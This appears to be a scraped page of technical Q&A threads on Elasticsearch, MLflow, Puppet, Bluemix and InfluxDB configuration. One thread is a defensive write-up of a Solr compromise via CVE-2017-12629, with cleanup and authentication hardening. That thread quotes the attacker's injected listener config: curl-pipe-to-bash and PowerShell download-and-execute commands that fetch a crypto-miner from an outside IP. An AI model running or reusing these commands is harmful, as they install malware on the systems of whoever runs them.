Elasticsearch index in production profile in JHipster

I have configured my application-prod.yml to match the installed Elasticsearch's elasticsearch.yml.
When I run mvn -Pprod (running the JHipster app in the prod profile), the app starts without errors, but I don't know where the Elasticsearch index is created.
When I open localhost:1000/_cat/indices?v in a browser it shows nothing, as if no index is present. But when I create a row in an entity, the index is created, and searching that same index returns the result. It is not present on my node.
I want to know how and where the Elasticsearch index is created and stored in the prod profile.
Here are the changes I made in application-prod.yml for Elasticsearch:
file: application-prod.yml
data:
  elasticsearch:
    cluster-name: my-application
    cluster-nodes: localhost:1000
file: elasticsearch.yml
cluster.name: my-application
node.name: mynode
path.data: W:\Apurva\ElasticSearch\elasticsearch-5.1.2\data
path.logs: W:\Apurva\ElasticSearch\elasticsearch-5.1.2\logs
http.port: 1000
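Assuming Elasticsearch really is listening on port 1000 as configured above, a quick way to check which indices exist on that node and where it keeps them on disk is (a verification sketch, not JHipster-specific):
curl 'http://localhost:1000/_cat/indices?v'         # list every index this node knows about
curl 'http://localhost:1000/_nodes/settings?pretty' # shows path.data, i.e. where this node stores its indexes on disk
If the index your app searches does not show up here, the app is writing to a different node than the one you are querying.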

Related

Mlflow - empty artifact folder

All,
I started the mlflow server as below. I do see the backend store containing the expected metadata. However, the artifact folder is empty despite many runs.
mlflow server --backend-store-uri mlflow_db --default-artifact-root ./mlflowruns --host 0.0.0.0 --port 5000
The mlflow ui has the below message for the artifacts section:
No Artifacts Recorded
Use the log artifact APIs to store file outputs from MLflow runs.
What am I doing wrong?
Thanks,
grajee
Turns out that --backend-store-uri mlflow_db was pointing to D:\python\Pythonv395\Scripts\mlflow_db, and --default-artifact-root ./mlflowruns was pointing to D:\DataEngineering\MlFlow\Wine Regression\mlflowruns, which is the project folder. In other words, the two relative paths were resolved against different directories. I was able to point both outputs to one folder with the following syntax:
file:/D:/DataEngineering/MlFlow/Wine Regression
In case you want to log artifacts to your server with the local file system as object storage, you should specify --serve-artifacts --artifacts-destination file:/path/to/your/desired/location instead of just a vanilla path.
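Putting the above together, a full invocation might look like this (a sketch using the Windows paths from the answer; adjust to your setup, and remember that bare relative paths are resolved against whatever directory you start the server from):
mlflow server \
  --backend-store-uri "file:/D:/DataEngineering/MlFlow/Wine Regression/mlflow_db" \
  --default-artifact-root "file:/D:/DataEngineering/MlFlow/Wine Regression/mlflowruns" \
  --host 0.0.0.0 --port 5000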

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
The site runs in Docker.
htop showed that all cores were loaded to 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; the UID 8983, however, pointed to the Solr container.
I tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (the only v6 available on Docker Hub, https://hub.docker.com/_/solr/), since the site had to keep working.
In Docker's logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
  "exe":"sh",
  "name":"newlistener-02",
  "args":["-c",
    "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
  "event":"newSearcher",
  "class":"solr.RunExecutableListener",
  "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we need just the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be seen at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
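To quickly check from the host whether a core has been tampered with, you can fetch that overlay directly; host, port and core name below are the same placeholders used throughout this answer:
curl 'http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay'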
Fixing:
Clean configoverlay.json, or simply remove the file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
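Since Solr runs in Docker here, the same fix from the host might look like this (container name and core name are placeholders; restarting the container also kills the running miner process inside it):
docker exec solr-container rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json
docker restart solr-container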
As I understand it, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
...and was fixed in v5.5.5, 6.6.2+ and 7.1+.
The root cause is that http://example.com:8983 was freely accessible to anyone, so even though this particular exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication":{
    "blockUnknown": true,
    "class":"solr.BasicAuthPlugin",
    "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
  },
  "authorization":{
    "class":"solr.RuleBasedAuthorizationPlugin",
    "permissions":[{"name":"security-edit", "role":"admin"}],
    "user-role":{"solr":"admin"}
  }
}
This file must be dropped at /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr uses its own hash scheme (a sha256(password+salt) hash), a typical htpasswd-style generator cannot be used here. The easiest way to generate the hash that I've found is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if the 'default' core is created. If not, create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to the web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
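Once the container is up, you can verify that BasicAuth is actually enforced. The hash in the security.json above is the solr/SolrRocks example from the Solr docs, so assuming you kept it for a first test:
curl -i 'http://127.0.0.1:8983/solr/admin/authentication'                # expect HTTP 401, since blockUnknown is true
curl -u solr:SolrRocks 'http://127.0.0.1:8983/solr/admin/authentication' # returns the authentication config
Remember to replace those default credentials with your own generated hash before going back to production.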

Puppet Enterprise error while running "puppet agent -t" command, unable to get User/Group data from Hiera

I have Puppet Enterprise installed on my VM, running in VirtualBox.
The installation went fine, but when I try to run the command puppet agent -t I get the following error:
[root@puppetmaster ~]# puppet agent -t
Info: Using configured environment 'production'
Info: Retrieving pluginfacts
Info: Retrieving plugin
Info: Loading facts
Error: Could not retrieve catalog from remote server: Error 500 on SERVER: Server Error: Evaluation Error: Error while evaluating a Function Call, Could not find data item role in any Hiera data file and no default supplied at /etc/puppetlabs/code/environments/production/manifests/site.pp:32:10 on node puppetmaster.localdomain
Warning: Not using cache on failed catalog
Error: Could not retrieve catalog; skipping run
Here is the site.pp line the error is coming from:
## site.pp ##
# This file (/etc/puppetlabs/puppet/manifests/site.pp) is the main entry point
# used when an agent connects to a master and asks for an updated configuration.
#
# Global objects like filebuckets and resource defaults should go in this file,
# as should the default node definition. (The default node can be omitted
# if you use the console and don't define any other nodes in site.pp. See
# http://docs.puppetlabs.com/guides/language_guide.html#nodes for more on
# node definitions.)
## Active Configurations ##
# Disable filebucket by default for all File resources:
#http://docs.puppetlabs.com/pe/latest/release_notes.html#filebucket-resource-no-longer-created-by-default
File { backup => false }
# DEFAULT NODE
# Node definitions in this file are merged with node data from the console. See
# http://docs.puppetlabs.com/guides/language_guide.html#nodes for more on
# node definitions.
# The default node definition matches any node lacking a more specific node
# definition. If there are no other nodes in this file, classes declared here
# will be included in every node's catalog, *in addition* to any classes
# specified in the console for that node.
node default {
# This is where you can declare classes for all nodes.
# Example:
# class { 'my_class': }
$role = hiera('role')
$location = hiera('location')
notify{"in the top level site.pp : role is '${role}', location is '${location}'": }
include "::roles::${role}"
}
If you look at the error, it can't find the hiera key that you've asked for in your site.pp:
Could not find data item role in any Hiera data file and no default supplied at /etc/puppetlabs/code/environments/production/manifests/site.pp:32:10 on node puppetmaster.localdomain
In your code, you have the following:
$role = hiera('role')
$location = hiera('location')
Both of these are hiera calls, which require that Hiera is set up and that the relevant key exists in a hieradata folder.
A useful tool for diagnosing Hiera issues is hiera_explain, which shows you how your Hiera hierarchy is set up and configured, and might help explain what the issue is with your code.
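For reference, a minimal sketch of what would satisfy the two lookups, assuming a default Hiera 3 layout with a common.yaml (the values are placeholders, not taken from the question):
# /etc/puppetlabs/code/environments/production/hieradata/common.yaml
role: 'webserver'
location: 'dc1'
Alternatively, hiera() accepts a default as its second argument, e.g. $role = hiera('role', 'base'), which avoids the hard catalog failure when the key is missing.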

Node.js cannot find mysql-database service

I'm trying to follow the tutorial noted below:
http://www.ibm.com/developerworks/cloud/library/cl-bluemix-nodejs-app/
But when I push my app, I see the following:
Using manifest file /mytests/bluemix-node-mysql-upload/manifest.yml
Updating app jea-node-mysql-upload in org jea68@gmail.com / space dev as jea68@gmail.com...
OK
Uploading jea-node-mysql-upload...
Uploading app files from: /mytests/bluemix-node-mysql-upload/app
Uploading 53.6K, 11 files
Done uploading
OK
FAILED
Could not find service mysql-database to bind to jea-node-mysql-upload
Is there a problem with the node.js buildpack or is the documentation faulty?
I've been able to push Node.js apps without any problems this morning. The documentation assumes the user knows that the service has already been created. The manifest.yml included in the tutorial's GitHub repo defines a service (mysql-database) that has not been created. Run the following command to create the service:
$ cf create-service mysql 100 jea-mysql-node-upload-service
Then modify the manifest.yml to include:
services:
- jea-mysql-node-upload-service
Alternatively, since you already have an app, you can bind the application to the service by running the following:
$ cf bind-service jea-node-mysql-upload jea-mysql-node-upload-service
$ cf start jea-node-mysql-upload
It looks like a fault in the documentation. If you look at Step 2 part 3, it says to create the mysql service using this command:
cf create-service mysql 100 mysql-node-upload
which will name the service instance mysql-node-upload; however, the manifest.yml file that you cloned from GitHub contains the service name mysql-database. It is the manifest.yml file that links the app with the service instance.
The options are either to change the manifest.yml file to the correct name of your mysql service instance, or to recreate the mysql service instance with the name that is in your manifest.yml.
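Either way, you can list the service instances that actually exist in your space and compare them with the services: block of your manifest.yml; the names must match exactly:
$ cf services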

How to change the location of the InfluxDB storage folder?

I've installed the package from the official site following the instructions. By default the physical destination of the database folder is /opt/influxdb/shared.
I've tried to change the properties in the config file and wrote them as below, but after that I can't start the influxdb service:
[storage]
dir = "/media/alex/Second/InfluxStorage/data/db" # my settings
How can I change the default database directory?
EDIT: This is for InfluxDB v1.x only. It has been reported to not work for InfluxDB v2.x.
Make a new directory where you want to put your data and set the appropriate permissions, e.g.:
mkdir /new/path/to/influxdb
sudo chown influxdb:influxdb /new/path/to/influxdb
Edit the following three lines of your /etc/influxdb/influxdb.conf (/usr/local/etc/influxdb.conf on macOS) so that they point to your new location:
# under [meta]
dir = "/new/path/to/influxdb/meta"
# under [data]
dir = "/new/path/to/influxdb/data"
wal-dir = "/new/path/to/influxdb/wal"
Restart the InfluxDB daemon.
sudo service influxdb restart # Ubuntu/Debian
brew services restart influxdb # macOS/homebrew
Done!
In case you want to move existing data, simply copy the existing data (the location can be found in influxdb.conf; /var/lib/influxdb on Ubuntu/Debian) to your new desired location before editing influxdb.conf, and make sure the new folder has the appropriate permissions/ownership.
There is some information about backups/restores in the official docs, but plain copying worked for me.
The above was tested on InfluxDB v1.2 on macOS/Ubuntu/Raspbian.
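A minimal sketch of that v1.x copy step (stop the daemon first so the files are consistent; the source path is the Ubuntu/Debian default, adjust to yours):
sudo service influxdb stop
sudo cp -R /var/lib/influxdb/. /new/path/to/influxdb/   # copies the meta, data and wal directories
sudo chown -R influxdb:influxdb /new/path/to/influxdb
sudo service influxdb start                             # after pointing influxdb.conf at the new paths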
For InfluxDB 2.0:
In InfluxDB 2.0 the data directories live below ~/.influxdbv2 by default.
There are actually two data stores: bolt (various key-value configuration data) and engine (the TSM database).
From the documentation, to change the location of the bolt database:
Default: ~/.influxdbv2/influxd.bolt
influxd flag: influxd --bolt-path=~/.influxdbv2/influxd.bolt
Environment variable: export INFLUXD_BOLT_PATH=~/.influxdbv2/influxd.bolt
Configuration file: bolt-path: /users/user/.influxdbv2/influxd.bolt
From the documentation, to change the location of the engine database:
Default: ~/.influxdbv2/engine
influxd flag: influxd --engine-path=~/.influxdbv2/engine
Environment variable: export INFLUXD_ENGINE_PATH=~/.influxdbv2/engine
Configuration file: engine-path: /users/user/.influxdbv2/engine
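Putting both together, running the daemon with all 2.0 storage under a hypothetical /data/influxdbv2 would look like this (flags as documented above; the path is a placeholder):
influxd --bolt-path=/data/influxdbv2/influxd.bolt --engine-path=/data/influxdbv2/engine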
